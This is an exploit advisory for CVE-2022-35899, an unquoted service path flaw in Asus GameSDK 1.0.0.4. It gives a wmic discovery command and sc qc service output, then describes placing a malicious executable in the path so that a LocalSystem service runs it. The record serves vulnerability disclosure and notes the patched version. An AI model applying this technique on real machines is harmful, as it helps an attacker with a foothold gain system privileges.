CVE-2022-35899
Unquoted Service Path Asus GameSdk
Exploit Title: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path (Privilege Escalation)
Date: 07/14/2022
Exploit Author: Angelo Pio Amirante
Version: 1.0.0.4
Tested on: Windows 10
Patched version: 1.0.5.0
Step to discover the unquoted service path:
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
Info on the service:
C:\>sc qc "GameSDK Service"
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: GameSDK Service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : GameSDK Service
DIPENDENZE :
SERVICE_START_NAME : LocalSystem
Exploit
If an attacker had already compromised the system and the current user has the privileges to write in the "C:\Program Files (x86)\ASUS" folder or in "C:" , he could place his own "Program.exe" or "GameSDK.exe" files respectively, and when the service starts, it would launch the malicious file, rather than the original "GameSDK.exe".
Impact
An attacker can elevate his privileges on the system.